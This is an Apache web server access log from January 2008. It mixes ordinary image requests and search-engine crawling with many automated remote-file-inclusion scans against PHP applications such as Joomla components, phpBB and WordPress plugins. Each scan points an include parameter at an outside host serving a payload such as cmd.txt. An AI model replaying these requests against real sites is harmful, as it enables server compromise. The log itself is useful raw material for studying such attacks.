72.199.235.196 - - [26/Jan/2008:16:40:00 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.199.235.196 - - [26/Jan/2008:16:40:00 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.199.235.196 - - [26/Jan/2008:16:40:00 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.199.235.196 - - [26/Jan/2008:16:40:01 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=34707" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
87.230.9.115 - - [26/Jan/2008:16:42:06 -0800] "GET /logs/errors.php?error=http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.230.9.115 - - [26/Jan/2008:16:42:06 -0800] "GET /errors.php?error=http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.209.129.18 - - [26/Jan/2008:16:44:10 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.209.129.18 - - [26/Jan/2008:16:44:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.209.129.18 - - [26/Jan/2008:16:44:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.228.34 - - [26/Jan/2008:16:45:43 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.venox.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.228.34 - - [26/Jan/2008:16:45:43 -0800] "GET //login.php?dir=http://www.venox.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.228.34 - - [26/Jan/2008:16:45:43 -0800] "GET /logs//login.php?dir=http://www.venox.xpg.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.32.152.6 - - [26/Jan/2008:16:46:48 -0800] "GET /errors.php?error=http://www.derekburrows.org/calendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.32.152.6 - - [26/Jan/2008:16:46:48 -0800] "GET /logs/errors.php?error=http://www.derekburrows.org/calendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
201.34.32.66 - - [26/Jan/2008:16:50:51 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.99.64 - - [26/Jan/2008:16:56:20 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.9.115 - - [26/Jan/2008:16:58:37 -0800] "GET /menu.php?http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.230.9.115 - - [26/Jan/2008:16:58:37 -0800] "GET /logs/menu.php?http://www.skanray.dk/hjem//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
70.85.224.170 - - [26/Jan/2008:16:59:53 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
70.85.224.170 - - [26/Jan/2008:16:59:53 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
208.101.20.178 - - [26/Jan/2008:17:01:11 -0800] "GET //errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.101.20.178 - - [26/Jan/2008:17:01:11 -0800] "GET /logs//errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
201.34.32.66 - - [26/Jan/2008:17:03:45 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.todored.es/dominios/administrator/components/com_comprofiler/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.63.132.57 - - [26/Jan/2008:17:04:49 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.lasiestamadrid.com//portal/images/zoom/PEASCH/sample.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.63.132.57 - - [26/Jan/2008:17:04:50 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.lasiestamadrid.com//portal/images/zoom/PEASCH/sample.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.63.132.57 - - [26/Jan/2008:17:04:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.lasiestamadrid.com//portal/images/zoom/PEASCH/sample.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.99.64 - - [26/Jan/2008:17:06:03 -0800] "GET /logs/access_080106.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.99.64 - - [26/Jan/2008:17:06:03 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.156.5 - - [26/Jan/2008:17:07:09 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://polepositionlingerie.com/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.156.5 - - [26/Jan/2008:17:07:22 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://polepositionlingerie.com/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.156.5 - - [26/Jan/2008:17:07:53 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://polepositionlingerie.com/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:17:10:51 -0800] "GET /logs/access_071230.log/modules/TotalCalendar/about.php?inc_dir=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:17:10:51 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:17:10:51 -0800] "GET /logs/modules/TotalCalendar/about.php?inc_dir=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.154 - - [26/Jan/2008:17:12:38 -0800] "GET /logs/access_071207.log HTTP/1.0" 200 248258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:15:08 -0800] "GET /logs/access_071224.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:15:08 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:15:09 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:16:19 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:16:19 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:16:19 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.156.5 - - [26/Jan/2008:17:18:13 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://polepositionlingerie.com/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.25.34 - - [26/Jan/2008:17:19:53 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [26/Jan/2008:17:19:53 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [26/Jan/2008:17:19:53 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.97.20.22 - - [26/Jan/2008:17:20:03 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.25.34 - - [26/Jan/2008:17:20:33 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/cmd/cmd.txt???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:11 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:12 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.197.124.107 - - [26/Jan/2008:17:21:12 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
8.6.223.5 - - [26/Jan/2008:17:21:59 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:16 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:16 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:17 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:17 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:18 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:18 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:19 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [26/Jan/2008:17:23:19 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:17:24:25 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [26/Jan/2008:17:24:43 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [26/Jan/2008:17:24:44 -0800] "GET /logs//login.php?dir=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.18 - - [26/Jan/2008:17:25:36 -0800] "GET /logs/access_080103.log HTTP/1.0" 200 448825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:27:13 -0800] "GET /logs/access_071228.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:27:14 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:27:14 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:16 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:16 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:16 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:17 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:17 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:17 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:18 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:18 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?p=374922#post374922" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
24.151.168.128 - - [26/Jan/2008:17:29:56 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:17:31:09 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:17:31:09 -0800] "GET //?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [26/Jan/2008:17:31:10 -0800] "GET /logs//?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 200 32488 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:33:16 -0800] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.148 - - [26/Jan/2008:17:34:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.148 - - [26/Jan/2008:17:34:32 -0800] "GET /logs/access_071024.log HTTP/1.0" 200 11603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.190.167.58 - - [26/Jan/2008:17:34:35 -0800] "GET /logs/access_080101.log/WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.190.167.58 - - [26/Jan/2008:17:34:36 -0800] "GET /logs/WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:34:36 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:35:15 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:35:15 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [26/Jan/2008:17:35:16 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.18.33 - - [26/Jan/2008:17:36:17 -0800] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.190.167.58 - - [26/Jan/2008:17:36:20 -0800] "GET /logs/access_071231.log/WebCalendar/tools/send_reminders.php?noSet=0&includedir=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [26/Jan/2008:17:40:04 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:17:42:27 -0800] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:17:42:28 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.91.99.14 - - [26/Jan/2008:17:43:40 -0800] "GET /logs/access_071229.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [26/Jan/2008:17:43:40 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [26/Jan/2008:17:45:51 -0800] "GET /logs/access_071230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [26/Jan/2008:17:45:51 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [26/Jan/2008:17:45:51 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.18.45.238 - - [26/Jan/2008:17:46:37 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?p=374922" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
